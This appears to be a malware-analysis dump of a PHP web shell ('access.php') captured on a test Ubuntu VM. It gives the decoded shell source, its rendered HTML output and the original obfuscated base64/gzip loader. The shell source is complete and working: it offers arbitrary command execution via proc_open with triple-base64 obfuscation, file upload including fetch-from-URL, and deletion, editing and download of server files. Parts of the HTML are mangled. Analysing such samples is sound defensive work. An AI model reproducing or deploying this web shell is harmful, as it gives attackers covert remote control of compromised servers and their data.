2	132	0	0.006233	522200	author	1		/var/www/html/uploads/access.php	586	0
			0.006266	428512
TRACE END   [2023-02-12 20:00:55.268400]


Generated HTML code

<html><head></head><body bgcolor="#1f1f1f" text="#ffffff">string(64) "eval('?&gt;'.gzuncompress(gzinflate(base64_decode(strrev($Lix)))));"
string(18760) "


    <meta name="theme-color" content="#1f1f1f">


<link href="" rel="stylesheet" type="text/css">
<link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.0/css/all.min.css" rel="stylesheet">
<style>
    @import url('https://fonts.googleapis.com/css?family=Dosis');
    @import url('https://fonts.googleapis.com/css?family=Bungee');
body {
    font-family: "Dosis", cursive;
    text-shadow:0px 0px 1px #757575;
}

body::-webkit-scrollbar {
  width: 12px;
}

body::-webkit-scrollbar-track {
  background: #1f1f1f;
}

body::-webkit-scrollbar-thumb {
  background-color: #1f1f1f;
  border: 3px solid gray;
}

#content tr:hover {
    background-color: #636263;
    text-shadow:0px 0px 10px #fff;
}

#content .first {
    background-color: #25383C;
}

#content .first:hover {
    background-color: #25383C
    text-shadow:0px 0px 1px #757575;
}

table {
    border: 1px #000000 dotted;
    table-layout: fixed;
    word-break: break-all;
}

textarea {
    max-width: 95%;
    max-height: 100%;
    resize: none;
    outline: none;
    overflow: auto;
    background: transparent;
    color: #fff;
}

textarea::-webkit-scrollbar {
  width: 12px;
}

textarea::-webkit-scrollbar-track {
  background: #1f1f1f;
}

textarea::-webkit-scrollbar-thumb {
  background-color: #1f1f1f;
  border: 3px solid gray;
}

a {
    color: #ffffff;
    text-decoration: none;
}

a:hover {
    color: gold;
    text-shadow:0px 0px 10px #ffffff;
}

input,select,textarea {
    border: 1px #000000 solid;
    -moz-border-radius: 5px;
    -webkit-border-radius:5px;
    border-radius:5px;
}

.gas {
    background-color: #1f1f1f;
    color: #ffffff;
    cursor: pointer;
}

select {
    background-color: transparent;
    color: #ffffff;
}

select:after {
    cursor: pointer;
}

.linka {
    background-color: transparent;
    color: #ffffff;
}

.up {
    background-color: transparent;
    color: #fff;
}

option {
    background-color: #1f1f1f;
}

::-webkit-file-upload-button {
  background: transparent;
  color: #fff;
  border-color: #fff;
  cursor: pointer;
}
</style>
<script>
function setfilename(val)
  {
    filename = val.split('\\').pop().split('/').pop();
    //filename = filename.substring(0, filename.lastIndexOf('.'));
    document.getElementById('namanya').value = filename;
  }

async function loadFile(file) {
    let text = await file.text();
    document.getElementById("bepasdata").innerHTML = text;
}
</script>
<center>
<font face="Bungee" size="5"></font></center>	
<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
<tbody><tr><td>
<!--?php
set_time_limit(0);
error_reporting(0);

$disfunc = @ini_get("disable_functions");
if (empty($disfunc)) {
    $disf = "<font color='gold'-->NONE";
} else {
    $disf = "<font color="red">".$disfunc."</font>";
}

function author() {
    echo "<center><br></center>";
    exit();
}

function cekdir() {
    if (isset($_GET['path'])) {
        $lokasi = $_GET['path'];
    } else {
        $lokasi = getcwd();
    }
    if (is_writable($lokasi)) {
        return "<font color="green">Writeable</font>";
    } else {
        return "<font color="red">Writeable</font>";
    }
}

function cekroot() {
    if (is_writable($_SERVER['DOCUMENT_ROOT'])) {
        return "<font color="green">Writeable</font>";
    } else {
        return "<font color="red">Writeable</font>";
    }
}

function xrmdir($dir) {
    $items = scandir($dir);
    foreach ($items as $item) {
        if ($item === '.' || $item === '..') {
            continue;
        }
        $path = $dir.'/'.$item;
        if (is_dir($path)) {
            xrmdir($path);
        } else {
            unlink($path);
        }
    }
    rmdir($dir);
}

function dunlut($file) {
    if (!is_readable($file)) {
        red("Cannot Download File / Unreadable File !");
        die();
    }
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="'.basename($file).'"');
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($filepath));
    flush();
    readfile($file);
    die();
}

function owner($file) {
    if (function_exists("posix_getpwuid")) {
        $tod = @posix_getpwuid(fileowner($file));
        return "<center>".$tod['name']."</center>";
    } else {
        return "<center>".fileowner($file)."</center>";
    }
}

function cekwrite($lokasi) {
    $izin = substr(sprintf('%o', fileperms($lokasi)), -4);
    if (is_writable($lokasi)) {
        return "<font color="green">".$izin."</font>";
    } else {
        return "<font color="red">".$izin."</font>";
    }
}

function ekse($komend, $lokasi) {
    if (!function_exists("proc_open")) {
        die("proc_open function disabled !");
    } elseif (!function_exists("base64_decode")) {
        die("base64_decode function disabled !");
    }
    $komen = base64_decode(base64_decode(base64_decode($komend)));
    $tod = @proc_open($komen, array(0 =&gt; array("pipe", "r"), 1 =&gt; array("pipe", "w"), 2 =&gt; array("pipe", "r")), $pipes, $lokasi);
    echo "<textarea rows="25" cols="100">".htmlspecialchars(stream_get_contents($pipes[1]))."</textarea><br><br>";
}

function ipserv() {
    if (empty($_SERVER['SERVER_ADDR'])) {
        return gethostbyname($_SERVER['SERVER_NAME']);
        if (empty(gethostbyname($_SERVER['SERVER_NAME']))) {
            return $_SERVER['SERVER_NAME'];
        }
    } else {
        return $_SERVER['SERVER_ADDR'];
    }
}

function cekfile($file) {
     return '<i class="fa fa-file" style="color: #d6d4ce"></i> ';
}

function filedate($file) {
    return date("F d Y g:i:s", filemtime($file));
}

function unzip($file, $lokasi) {
    if (!is_readable($file)) {
        red("Cannot Unzip File / Unreadable File !");
        die();
    } elseif (strpos(file_get_contents($file), "\x50\x4b\x03\x04") === false) {
        red("This isn't Zip File !");
        die();
    }
    $zip = new ZipArchive;
    $res = $zip -&gt; open($file);
    if ($res == true) {
        $zip -&gt; extractTo($lokasi);
        $zip -&gt; close();
        green("Success Unzip File !");
    } else {
        red("Failed to Unzip File !");
    }
}

function green($text) {
    echo "<center><font color="green">".$text."</font></center>";
}

function red($text) {
    echo "<center><font color="red">".$text."</font></center>";
}

echo "Server IP : <font color="gold">".ipserv()."</font> &nbsp;/&nbsp; Your IP : <font color="gold">".$_SERVER['REMOTE_ADDR']."</font><br>";
echo "Web Server : <font color="gold">".$_SERVER['SERVER_SOFTWARE']."</font><br>";
echo "System : <font color="gold">".php_uname()."</font><br>";
echo "User : <font color="gold">".@get_current_user()."&nbsp;</font>( <font color="gold">".@getmyuid()."</font>)<br>";
echo "PHP Version : <font color="gold">".@phpversion()."</font><br>";
echo "Disable Function : ".$disf."<br>";
echo "MySQL : ";
if (function_exists("mysql_connect")) {
    echo "<font color="green">ON</font>";
} else {
    echo "<font color="red">OFF</font>";
}
echo " &nbsp;|&nbsp; cURL : ";
if (function_exists("curl_init")) {
    echo "<font color="green">ON</font>";
} else {
    echo "<font color="red">OFF</font>";
}
echo " &nbsp;|&nbsp; WGET : ";
if (file_exists("/usr/bin/wget")) {
    echo "<font color="green">ON</font>";
} else {
    echo "<font color="red">OFF</font>";
}
echo " &nbsp;|&nbsp; Perl : ";
if (file_exists("/usr/bin/perl")) {
    echo "<font color="green">ON</font>";
} else {
    echo "<font color="red">OFF</font>";
}
echo " &nbsp;|&nbsp; Python : ";
if (file_exists("/usr/bin/python2")) {
    echo "<font color="green">ON</font>";
} else {
    echo "<font color="red">OFF</font>";
}

foreach($_POST as $key =&gt; $value){
    $_POST[$key] = stripslashes($value);
}

if(isset($_GET['path'])){
    $lokasi = $_GET['path'];
    $lokdua = $_GET['path'];
} else {
    $lokasi = getcwd();
    $lokdua = getcwd();
}

$lokasi = str_replace('\\','/',$lokasi);
$lokasis = explode('/',$lokasi);
$lokasinya = @scandir($lokasi);

echo "<br>Directory (".cekwrite($lokasi).") : &nbsp;";

foreach($lokasis as $id =&gt; $lok){
    if($lok == '' &amp;&amp; $id == 0){
        $a = true;
        echo '<a href="?path=/">/</a>';
        continue;
    }
    if($lok == '') continue;
    echo '<a href="?path=';
    for($i=0;$i<=$id;$i++){
    echo " $lokasis[$i]";="" if($i="" !="$id)" echo="" "="" ";="" }="" '"="">'.$lok.'</a>/';
}

echo '</td></tr><tr><td>';
if (isset($_POST['upwkwk'])) {
    if ($_POST['dirnya'] == "2") {
            $lokasi = $_SERVER['DOCUMENT_ROOT'];
        }
    if (isset($_POST['berkasnya'])) {
        $data = @file_put_contents($lokasi."/".$_FILES['berkas']['name'], @file_get_contents($_FILES['berkas']['tmp_name']));
        if (file_exists($lokasi."/".$_FILES['berkas']['name'])) {
            echo "File Uploaded ! &nbsp;<font color="gold"><i>".$lokasi."/".$_FILES['berkas']['name']."</i></font><br><br>";
        } else {
            echo "<font color="red">Failed to Upload !<br><br>";
        }
    } elseif (isset($_POST['linknya'])) {
        if (empty($_POST['namalink'])) {
            exit("Filename cannot be empty !");
        }
        if ($_POST['dirnya'] == "2") {
            $lokasi = $_SERVER['DOCUMENT_ROOT'];
        }
        $data = @file_put_contents($lokasi."/".$_POST['namalink'], @file_get_contents($_POST['darilink']));
        if (file_exists($lokasi."/".$_POST['namalink'])) {
            echo "File Uploaded ! &nbsp;<font color="gold"><i>".$lokasi."/".$_POST['namalink']."</i></font><br><br>";
        } else {
            echo "<font coloe="red">Failed to Upload !<br><br>";
        }
    } elseif (isset($_POST['bepas'])) {
        $bepasdata = $_POST['bepasdata'];
        $bepasnama = $_POST['bepasnama'];
        if ($bepasdata) {
            echo "string";
        }
        @file_put_contents($lokasi."/".$bepasnama, $bepasdata);
        if (file_exists($lokasi."/".$bepasnama)) {
            echo "File Uploaded ! &nbsp;<font color="gold"><i>".$lokasi."/".$bepasnama."</i></font><br><br>";
        } else {
            echo "<font coloe="red">Failed to Upload !<br><br>";
        }
    }
}

echo "</font></font></font></td></tr></tbody></table><br>";
echo '';
echo '';
echo '';
echo '';
echo "<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"><tbody><tr><th>[ &nbsp;<a href="'.$_SERVER['SCRIPT_NAME'].'">Home</a>&nbsp; ]</th><th>[ &nbsp;<a href="?path='.$lokasi.'&amp;komend=gaskan">C0mmand</a>&nbsp; ]</th><th>[ &nbsp;<a href="?path='.$lokasi.'&amp;upload=gaskan">Upload File</a>&nbsp; ]</th></tr></tbody></table><br>";

if (isset($_GET['fileloc'])) {
    echo "Current File : ".$_GET['fileloc'];
    echo '<br>';
    echo "<pre>".htmlspecialchars(file_get_contents($_GET['fileloc']))."</pre>";
    author();
} elseif (isset($_GET['pilihan']) &amp;&amp; $_POST['pilih'] == "hapus") {
    if (is_dir($_POST['path'])) {
        xrmdir($_POST['path']);
        if (file_exists($_POST['path'])) {
            red("Failed to delete Directory !");
        } else {
            green("Delete Directory Success !");
        }
    } elseif (is_file($_POST['path'])) {
        @unlink($_POST['path']);
        if (file_exists($_POST['path'])) {
            red("Failed to Delete File !");
        } else {
            green("Delete File <i>".basename($_POST['path'])."</i> Success !");
        }
    }
} elseif (isset($_GET['pilihan']) &amp;&amp; $_POST['pilih'] == "gantinama") {
    if (isset($_POST['gantin'])) {
        $ren = @rename($_POST['path'], $_POST['newname']);
        if ($ren == true) {
            green("Change Name Success !");
        } else {
            red("Change Name Failed !");
        }
    }
    if (empty($_POST['name'])) {
        $namaawal = $_POST['newname'];
    } else {
        $namawal = $_POST['name'];
    }
    echo "<center>".$_POST['path']."<br>";
    echo '<form method="post">
    New Name : <input name="newname" type="text" class="up" size="20" value="'.$namaawal.'">
    <input type="hidden" name="path" value="'.$_POST['path'].'">
    <input type="hidden" name="pilih" value="gantinama">
    <input type="submit" value="Change" name="gantin" class="up" style="cursor: pointer; border-color: #fff">
    </form>';
} elseif (isset($_GET['pilihan']) &amp;&amp; $_POST['pilih'] == "edit") {
    if (isset($_POST['gasedit'])) {
        $edit = @file_put_contents($_POST['path'], $_POST['src']);
        if ($edit == true) {
            green("Edit File Success !");
        } else {
            red("Edit File Failed !");
        }
    }
    echo "<center>".$_POST['path']."<br><br>";
    echo '<form method="post">
    <textarea cols="80" rows="20" name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br>
    <input type="hidden" name="path" value="'.$_POST['path'].'">
    <input type="hidden" name="pilih" value="edit">
    <input type="submit" value="Edit File" name="gasedit">
    </form><br>';
} elseif (isset($_GET['pilihan']) &amp;&amp; $_POST['pilih'] == "dunlut") {
    dunlut($_POST['path']);
} elseif (isset($_GET['pilihan']) &amp;&amp; $_POST['pilih'] == "unzip") {
    unzip($_POST['path'], $lokasi);
} elseif ($_REQUEST['upload'] == "gaskan") {
    echo "<center>Upload File : ";
    echo '<form enctype="multipart/form-data" method="post">
<input type="radio" value="1" name="dirnya" checked="">current_dir [ '.cekdir().' ]
<input type="radio" value="2" name="dirnya">document_root [ '.cekroot().' ]
<br>
<input type="hidden" name="upwkwk" value="aplod">
<input type="file" name="berkas"><input type="submit" name="berkasnya" value="Upload" class="up" style="cursor: pointer; border-color: #fff"><br><br>
Upload File From Link :<br>
<input type="text" name="darilink" class="up" placeholder="https://anon7.xyz/upload.txt">&nbsp;<input type="text" name="namalink" class="up" size="3" placeholder="file.txt"><input type="submit" name="linknya" class="up" value="Upload" style="cursor: pointer; border-color: #fff">
<br><br>403 Upload File<br>
<input type="file" id="datanya" onchange="setfilename(this.value); loadFile(this.files[0])">
<input type="hidden" name="bepasnama" id="namanya">
<textarea style="display: none" id="bepasdata" name="bepasdata"></textarea>
<input type="submit" name="bepas" value="Upload" class="up" style="cursor: pointer; border-color: #fff">
</form><br><br></center>';
} elseif ($_GET['komend'] == "gaskan") {
    echo "<center>";
    echo '<form method="post" onsubmit="document.getElementById(\'komendnya\').value = btoa(btoa(btoa(document.getElementById(\'komendnya\').value)))">
    '.@get_current_user().'@'.ipserv().':~ $ <input type="text" name="komend" id="komendnya" style="background-color: #1f1f1f; color: #fff">
    <input type="submit" name="eksekomend" value=" >> " class="up" style="cursor: pointer; border-color: #fff">
    </form><br>';
    if (isset($_POST['eksekomend'])) {
        ekse($_POST['komend'], $lokasi);
    }
    echo "</center>";
} 

if (!is_readable($lokasi)) {
    die("<center>This directory is unreadable :(</center>");
}

echo '<div id="content">';

foreach($lokasinya as $dir){
    if(!is_dir($lokasi."/".$dir) || $dir == '.') continue;
    echo "";
}

echo '';
foreach($lokasinya as $file) {
    if(!is_file("$lokasi/$file")) continue;
    $size = filesize("$lokasi/$file")/1024;
    $size = round($size,3);
    if($size &gt;= 1024){
    $size = round($size/1024,2).' MB';
} else {
    $size = $size.' KB';
}

echo "";
}
echo '<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
<tbody><tr class="first">
<td><center>Name</center></td>
<td><center>Size</center></td>
<td><center>Last Modified</center></td>
<td><center>Owner</center></td>
<td><center>Permissions</center></td>
<td><center>Options</center></td>
</tr><tr>
    <td><i class="fa fa-folder" style="color: #ffe9a2"></i> <a href="\&quot;?path=&quot;.$lokasi.&quot;/&quot;.$dir.&quot;\&quot;">".$dir."</a></td>
    <td><center>--</center></td>
    <td><center>".filedate($lokasi."/".$dir)."</center></td>
    <td>".owner($lokasi."/".$dir)."</td>
    <td><center>";
    if(is_writable($lokasi."/".$dir)) echo '<font color="green">';
    elseif(!is_readable($lokasi."/".$dir)) echo '<font color="red">';
    echo statusnya($lokasi."/".$dir);
    if(is_writable($lokasi."/".$dir) || !is_readable($lokasi."/".$dir)) echo '</font>';

    echo "</font></center></td>
    <td><center><form method="\&quot;POST\&quot;" action="\&quot;?pilihan&amp;path=$lokasi\&quot;">
    <select name="\&quot;pilih\&quot;">
    <option value="\&quot;\&quot;"></option>
    <option value="\&quot;hapus\&quot;">Delete</option>
    <option value="\&quot;gantinama\&quot;">Rename</option>
    </select>
    <input type="\&quot;hidden\&quot;" name="\&quot;type\&quot;" value="\&quot;dir\&quot;">
    <input type="\&quot;hidden\&quot;" name="\&quot;name\&quot;" value="\&quot;$dir\&quot;">
    <input type="\&quot;hidden\&quot;" name="\&quot;path\&quot;" value="\&quot;$lokasi/$dir\&quot;">
    <input type="\&quot;submit\&quot;" class="\&quot;gas\&quot;" value="\&quot;">\" /&gt;
    </form></center></td>
    </tr><tr class="first"><td></td><td></td><td></td><td></td><td></td><td></td></tr><tr>
<td>".cekfile($lokasi."/".$file)."<a href="\&quot;?fileloc=$lokasi/$file&amp;path=$lokasi\&quot;">$file</a></td>
<td><center>".$size."</center></td>
<td><center>".filedate($lokasi."/".$file)."</center></td>
<td>".owner($lokasi."/".$file)."</td>
<td><center>";
if(is_writable("$lokasi/$file")) echo '<font color="green">';
elseif(!is_readable("$lokasi/$file")) echo '<font color="red">';
echo statusnya("$lokasi/$file");
if(is_writable("$lokasi/$file") || !is_readable("$lokasi/$file")) echo '</font>';
echo "</font></center></td><td><center>
<form method="\&quot;post\&quot;" action="\&quot;?pilihan&amp;path=$lokasi\&quot;">
<select name="\&quot;pilih\&quot;">
<option value="\&quot;\&quot;"></option>
<option value="\&quot;hapus\&quot;">Delete</option>
<option value="\&quot;dunlut\&quot;">Download</option>
<option value="\&quot;gantinama\&quot;">Rename</option>
<option value="\&quot;edit\&quot;">Edit</option>";
if (class_exists("ZipArchive")) {
    echo "<option value="\&quot;unzip\&quot;">Unzip</option>";
}
echo "</select>
<input type="\&quot;hidden\&quot;" name="\&quot;type\&quot;" value="\&quot;file\&quot;">
<input type="\&quot;hidden\&quot;" name="\&quot;name\&quot;" value="\&quot;$file\&quot;">
<input type="\&quot;hidden\&quot;" name="\&quot;path\&quot;" value="\&quot;$lokasi/$file\&quot;">
<input type="\&quot;submit\&quot;" class="\&quot;gas\&quot;" value="\&quot;">\" /&gt;
</form></center></td>
</tr></tbody></table>';
author();

function statusnya($file){
$izin = substr(sprintf('%o', fileperms($file)), -4);
return $izin;
}
?&gt;"




    <meta name="theme-color" content="#1f1f1f">


<link href="" rel="stylesheet" type="text/css">
<link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.0/css/all.min.css" rel="stylesheet">
<style>
    @import url('https://fonts.googleapis.com/css?family=Dosis');
    @import url('https://fonts.googleapis.com/css?family=Bungee');
body {
    font-family: "Dosis", cursive;
    text-shadow:0px 0px 1px #757575;
}

body::-webkit-scrollbar {
  width: 12px;
}

body::-webkit-scrollbar-track {
  background: #1f1f1f;
}

body::-webkit-scrollbar-thumb {
  background-color: #1f1f1f;
  border: 3px solid gray;
}

#content tr:hover {
    background-color: #636263;
    text-shadow:0px 0px 10px #fff;
}

#content .first {
    background-color: #25383C;
}

#content .first:hover {
    background-color: #25383C
    text-shadow:0px 0px 1px #757575;
}

table {
    border: 1px #000000 dotted;
    table-layout: fixed;
    word-break: break-all;
}

textarea {
    max-width: 95%;
    max-height: 100%;
    resize: none;
    outline: none;
    overflow: auto;
    background: transparent;
    color: #fff;
}

textarea::-webkit-scrollbar {
  width: 12px;
}

textarea::-webkit-scrollbar-track {
  background: #1f1f1f;
}

textarea::-webkit-scrollbar-thumb {
  background-color: #1f1f1f;
  border: 3px solid gray;
}

a {
    color: #ffffff;
    text-decoration: none;
}

a:hover {
    color: gold;
    text-shadow:0px 0px 10px #ffffff;
}

input,select,textarea {
    border: 1px #000000 solid;
    -moz-border-radius: 5px;
    -webkit-border-radius:5px;
    border-radius:5px;
}

.gas {
    background-color: #1f1f1f;
    color: #ffffff;
    cursor: pointer;
}

select {
    background-color: transparent;
    color: #ffffff;
}

select:after {
    cursor: pointer;
}

.linka {
    background-color: transparent;
    color: #ffffff;
}

.up {
    background-color: transparent;
    color: #fff;
}

option {
    background-color: #1f1f1f;
}

::-webkit-file-upload-button {
  background: transparent;
  color: #fff;
  border-color: #fff;
  cursor: pointer;
}
</style>
<script>
function setfilename(val)
  {
    filename = val.split('\\').pop().split('/').pop();
    //filename = filename.substring(0, filename.lastIndexOf('.'));
    document.getElementById('namanya').value = filename;
  }

async function loadFile(file) {
    let text = await file.text();
    document.getElementById("bepasdata").innerHTML = text;
}
</script>
<center>
<font face="Bungee" size="5"></font></center>	
<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
<tbody><tr><td>
Server IP : <font color="gold">::1</font> &nbsp;/&nbsp; Your IP : <font color="gold">::1</font><br>Web Server : <font color="gold">Apache/2.4.52 (Ubuntu)</font><br>System : <font color="gold">Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64</font><br>User : <font color="gold">osboxes&nbsp;</font>( <font color="gold">1000</font>)<br>PHP Version : <font color="gold">7.2.34-37+ubuntu22.04.1+deb.sury.org+1</font><br>Disable Function : <font color="red">pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,</font><br>MySQL : <font color="red">OFF</font> &nbsp;|&nbsp; cURL : <font color="green">ON</font> &nbsp;|&nbsp; WGET : <font color="green">ON</font> &nbsp;|&nbsp; Perl : <font color="green">ON</font> &nbsp;|&nbsp; Python : <font color="red">OFF</font><br>Directory (<font color="green">0777</font>) : &nbsp;<a href="?path=/">/</a><a href="?path=/var">var</a>/<a href="?path=/var/www">www</a>/<a href="?path=/var/www/html">html</a>/</td></tr><tr><td></td></tr></tbody></table><br><table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"><tbody><tr><th>[ &nbsp;<a href="/access.php">Home</a>&nbsp; ]</th><th>[ &nbsp;<a href="?path=/var/www/html&amp;komend=gaskan">C0mmand</a>&nbsp; ]</th><th>[ &nbsp;<a href="?path=/var/www/html&amp;upload=gaskan">Upload File</a>&nbsp; ]</th></tr></tbody></table><br><div id="content"><table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
<tbody><tr class="first">
<td><center>Name</center></td>
<td><center>Size</center></td>
<td><center>Last Modified</center></td>
<td><center>Owner</center></td>
<td><center>Permissions</center></td>
<td><center>Options</center></td>
</tr><tr>
    <td><i class="fa fa-folder" style="color: #ffe9a2"></i> <a href="?path=/var/www/html/..">..</a></td>
    <td><center>--</center></td>
    <td><center>February 12 2023 5:00:22</center></td>
    <td><center>root</center></td>
    <td><center><font color="green">0777</font></center></td>
    <td><center><form method="POST" action="?pilihan&amp;path=/var/www/html">
    <select name="pilih">
    <option value=""></option>
    <option value="hapus">Delete</option>
    <option value="gantinama">Rename</option>
    </select>
    <input type="hidden" name="type" value="dir">
    <input type="hidden" name="name" value="..">
    <input type="hidden" name="path" value="/var/www/html/..">
    <input type="submit" class="gas" value=">">
    </form></center></td>
    </tr><tr class="first"><td></td><td></td><td></td><td></td><td></td><td></td></tr><tr>
<td><i class="fa fa-file" style="color: #d6d4ce"></i> <a href="?fileloc=/var/www/html/access.php&amp;path=/var/www/html">access.php</a></td>
<td><center>24.901 KB</center></td>
<td><center>February 12 2023 5:00:22</center></td>
<td><center>osboxes</center></td>
<td><center>0664</center></td><td><center>
<form method="post" action="?pilihan&amp;path=/var/www/html">
<select name="pilih">
<option value=""></option>
<option value="hapus">Delete</option>
<option value="dunlut">Download</option>
<option value="gantinama">Rename</option>
<option value="edit">Edit</option></select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="access.php">
<input type="hidden" name="path" value="/var/www/html/access.php">
<input type="submit" class="gas" value=">">
</form></center></td>
</tr><tr>
<td><i class="fa fa-file" style="color: #d6d4ce"></i> <a href="?fileloc=/var/www/html/beneri.se_malware_analysis&amp;path=/var/www/html">beneri.se_malware_analysis</a></td>
<td><center>0 KB</center></td>
<td><center>February 12 2023 5:00:22</center></td>
<td><center>root</center></td>
<td><center>0644</center></td><td><center>
<form method="post" action="?pilihan&amp;path=/var/www/html">
<select name="pilih">
<option value=""></option>
<option value="hapus">Delete</option>
<option value="dunlut">Download</option>
<option value="gantinama">Rename</option>
<option value="edit">Edit</option></select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="beneri.se_malware_analysis">
<input type="hidden" name="path" value="/var/www/html/beneri.se_malware_analysis">
<input type="submit" class="gas" value=">">
</form></center></td>
</tr></tbody></table><center><br></center></div></div></center></center></body></html>

Original PHP code

<?php
// Your code here!
$Cyto = "Sy1LzNFQt1dLL7FW10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JT\x635PSdUoLikqSi3TUPHJrNAE\x41Ws\x41";
$Lix = "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